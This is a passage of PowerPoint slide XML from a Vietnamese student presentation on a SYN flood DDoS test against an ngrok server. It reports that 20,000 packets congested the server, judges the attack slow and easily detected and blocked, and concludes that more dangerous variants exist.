            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>số</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghẽn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 20000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Điều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thấy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vẫn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chưa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ưu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>việc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phải</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mất</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làm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tê</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>liệt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dễ</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ngăn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chặn</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này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bị</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kịp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thời</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dấu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dễ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dàng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhận</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>biết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</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và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cũng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bị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngăn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chặn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chuyên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thậm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chí</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lộ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đề</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trở</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiêm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trọng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30089963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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57"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58"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2BB1-A22D-4124-86CB-3FD4578B4245}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thúc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F19C3DF-C642-4DEC-B1D2-440F76BB6CD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đây</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bài</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>em</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ddos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thuộc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>loại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> syn flood (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhóm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>giao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dù</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tán</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ddos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhưng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vẫn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>còn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>biến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>loại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ddos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cũng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sẽ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tương</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
